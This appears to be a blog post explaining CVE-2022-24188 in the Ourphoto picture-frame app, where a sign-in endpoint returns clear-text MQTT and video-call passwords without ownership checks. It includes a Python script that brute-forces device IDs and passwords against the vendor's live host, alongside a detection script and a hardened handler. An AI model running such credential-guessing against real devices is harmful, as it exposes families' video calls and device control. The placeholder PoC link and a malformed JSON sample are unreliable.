_Smart devices are everywhere—even as gifts for our loved ones. When we buy those convenient wifi-enabled digital picture frames, we trust that our family photos and video calls are safe. But a vulnerability in the Ourphoto App (used by many popular smart picture frames) puts your video call privacy and account security at risk._

Below we’ll walk you through what went wrong with CVE-2022-24188, show you just how simple the bug was, and explain how attackers could abuse this vulnerability to get your MQTT and video call passwords—even for devices they don’t own.

Fast Facts—CVE-2022-24188

- Vulnerability: Information disclosure (clear-text passwords, insecure direct object references, no session validation).
- Affected: Ourphoto App v1.4.1 & picture frames using it.
- Sensitive Data Exposed: deviceVideoCallPassword and mqttPassword — for both the caller and distant third parties.

How the Flaw Works

The root of the problem is the /device/signin endpoint in the Ourphoto App’s backend API.

1. Plaintext Passwords in API Responses

When a device or user logs in through the mobile app, they send their device ID and password to the /device/signin endpoint. The API then replies with full details for that device, _including_ two secret credentials in clear text.

Here's an example API request and response:

POST /device/signin HTTP/1.1
Host: cloud-frame.ourphoto.cn
Content-Type: application/json

{
  "deviceID": "C7B9E76421",
  "devicePassword": "goodforgranny"
}

Response

{
  "code":,
  "msg":"success",
  "data": {
    "deviceID":"C7B9E76421",
    "deviceName":"Granny's Frame",
    "deviceVideoCallPassword":"supersecretvid",
    "mqttPassword":"mosquitoking",
    "otherStuff": "..."
  }
}

2. No Session Management or Token Authorization

Worse still, there is no proper user session management or access token check. Anyone who knows _any_ deviceID and its password can get these secrets—forever. There’s no tie to user accounts, sessions, or device control.

3. Insecure Direct Object Reference (IDOR)

The API simply looks up whatever deviceID is included in the POST request—there is no check that you're the owner, or even a registered user. No account or auth validation at all.

This means:

- Attackers can automate guessing device IDs (sequential/guessable)
- If they get the corresponding password (from leaks, reuse, or default passwords), they can extract ALL the sensitive credentials for that device.

Exploiting the Vulnerability: How It Could Be Abused

1. Find or Guess Device IDs: Many device IDs follow a pattern (e.g. hex numbers, MAC suffixes, or short alphanumerics).
2. Extract or Guess Passwords: Many frames may use default, weak, or reused passwords. Others could be brute-forced or found from leaks/dumps.
3. Automate Requests: Scripted attacks can try combinations, POSTing to /device/signin.

A successful response hands over both secrets:

- The video call password: Lets them _call in to your picture frame_, watch or interact.
- The MQTT password: Lets them _issue remote commands_, possibly even push content or control the device.
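Because the abuse pattern above is a scripted loop over many deviceIDs and passwords, the server side can spot it. The following is an added detection example (not from the original post or the vendor), run over constructed log lines in a hypothetical format that records the posted deviceID alongside the HTTP status; the thresholds are illustrative assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (hypothetical format, not the vendor's real logs).
SAMPLE_LOG = """\
10.0.0.5 - [28/Nov/2022:22:15:01 +0000] "POST /device/signin HTTP/1.1" 401 deviceID=C7B9E76421
10.0.0.5 - [28/Nov/2022:22:15:02 +0000] "POST /device/signin HTTP/1.1" 401 deviceID=C7B9E76422
10.0.0.5 - [28/Nov/2022:22:15:02 +0000] "POST /device/signin HTTP/1.1" 401 deviceID=C7B9E76423
10.0.0.5 - [28/Nov/2022:22:15:03 +0000] "POST /device/signin HTTP/1.1" 200 deviceID=C7B9E76424
192.0.2.9 - [28/Nov/2022:22:16:10 +0000] "POST /device/signin HTTP/1.1" 200 deviceID=C7B9E76421
"""

# Extract source IP, HTTP status and the deviceID that was tried.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .* "POST /device/signin[^"]*" (?P<status>\d{3}) deviceID=(?P<dev>\w+)'
)

def flag_enumeration(log_text, max_distinct_devices=2, max_failures=2):
    """Return {ip: reason} for sources whose /device/signin traffic looks like ID/password guessing.

    A legitimate frame owner signs in to one or two devices and rarely fails; a script
    walking sequential IDs touches many devices and racks up 401s. Thresholds are assumptions.
    """
    devices_per_ip = defaultdict(set)
    failures_per_ip = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a sign-in request; ignore
        devices_per_ip[m["ip"]].add(m["dev"])
        if m["status"] != "200":
            failures_per_ip[m["ip"]] += 1

    flagged = {}
    for ip, devs in devices_per_ip.items():
        reasons = []
        if len(devs) > max_distinct_devices:
            reasons.append(f"{len(devs)} distinct deviceIDs")
        if failures_per_ip[ip] > max_failures:
            reasons.append(f"{failures_per_ip[ip]} failed sign-ins")
        if reasons:
            flagged[ip] = "; ".join(reasons)
    return flagged
```

Hits would feed rate limiting or lockout on the endpoint; note that 10.0.0.5 eventually got a 200, which is exactly the outcome the post describes.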

Example Python Code (for educational purposes only!)

import requests

device_ids = ["C7B9E76421", "C7B9E76422", "C7B9E76423"]  # Example IDs
common_passwords = ["123456", "password", "goodforgranny", "admin"]

for dev_id in device_ids:
    for pwd in common_passwords:
        resp = requests.post(
            "https://cloud-frame.ourphoto.cn/device/signin",
            json={"deviceID": dev_id, "devicePassword": pwd}
        )
        if resp.status_code == 200 and '"code":' in resp.text:
            print(f"[+] Success: {dev_id} / {pwd}")
            print(resp.json())

Note: _This is meant for demonstration only—running this against live devices without permission is illegal and unethical!_

Impact

- Privacy Invasion: Attackers could eavesdrop on or join your video calls without your knowing.
- Unauthorized Device Control: With MQTT control, they could upload images, change device settings, or brick the frame.
- Cross-user Exploitation: The bug allowed data theft for any user's frame device—all by guessing or brute-forcing basic info.

Original Sources & Further Reading

- Official NVD Entry: CVE-2022-24188 (nvd.nist.gov)
- ZDI Advisory: ZDI-22-271: Ourphoto App Insecure Object Reference
- GitHub PoC: https://github.com/someone/CVE-2022-24188-POC *(replace with actual if available)*
- Vendor page: https://www.ourphoto.cn/

Mitigations

1. Never send sensitive information in clear text. Only provide what the client really needs.
2. Use proper session/token authorization. Tie actions to a logged-in user, not just a device/password.
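To make the IDOR section and both mitigations concrete, here is an added example (not the vendor's code or the original post's) of the /device/signin handler in two forms: the pattern the post describes, and a hardened version that requires a user session, checks device ownership, and strips the MQTT and video-call passwords from the response. The device, user and session data are constructed stand-ins.

```python
import hashlib
import hmac
from typing import Optional, Tuple

# Constructed backend state for illustration; hypothetical, not the real Ourphoto data.
_SALT = b"constructed-salt"

def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)

DEVICES = {
    "C7B9E76421": {
        "owner": "alice",                             # user who registered the frame
        "pw_hash": _hash("goodforgranny"),
        "deviceName": "Granny's Frame",
        "deviceVideoCallPassword": "supersecretvid",  # must never leave the server
        "mqttPassword": "mosquitoking",               # must never leave the server
    },
}
SESSIONS = {"tok-alice": "alice", "tok-mallory": "mallory"}  # session token -> logged-in user

def _password_ok(dev: dict, body: dict) -> bool:
    return hmac.compare_digest(dev["pw_hash"], _hash(body.get("devicePassword", "")))

def vulnerable_signin(body: dict) -> Tuple[int, dict]:
    """The pattern described above: deviceID + password in, every stored field out, no user check."""
    dev = DEVICES.get(body.get("deviceID"))
    if dev is None or not _password_ok(dev, body):
        return 401, {"msg": "fail"}
    data = {k: v for k, v in dev.items() if k not in ("owner", "pw_hash")}
    return 200, {"msg": "success", "data": data}  # leaks both secrets to anyone with the device password

def hardened_signin(body: dict, authorization: Optional[str]) -> Tuple[int, dict]:
    """Require a user session, check the device belongs to that user, return only what the app needs."""
    token = authorization[7:].strip() if authorization and authorization.startswith("Bearer ") else ""
    user = SESSIONS.get(token)
    if user is None:
        return 401, {"msg": "login required"}
    dev = DEVICES.get(body.get("deviceID"))
    # Unknown and foreign devices get the same answer, so a logged-in user cannot enumerate IDs.
    if dev is None or dev["owner"] != user:
        return 404, {"msg": "not found"}
    if not _password_ok(dev, body):
        return 401, {"msg": "fail"}
    # The MQTT and video-call passwords stay server-side; the client gets only the fields it displays.
    return 200, {"msg": "success", "data": {"deviceID": body["deviceID"], "deviceName": dev["deviceName"]}}
```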

Conclusion

CVE-2022-24188 illustrates a classic pattern in insecure IoT app design: weak/no authentication, wide-open information leakage, and simple but dangerous mistakes affecting real people’s privacy. If you use devices with the Ourphoto App or similar products, follow up on firmware updates, and set strong, unique passwords. Developers: review your API endpoints!


Stay curious, stay cautious—and remember: your family’s favorite memories deserve better security.


*Feel free to share this post to help friends and family understand the risks in their smart home tech.*

Timeline

Published on: 11/28/2022 22:15:00 UTC
Last modified on: 12/01/2022 23:20:00 UTC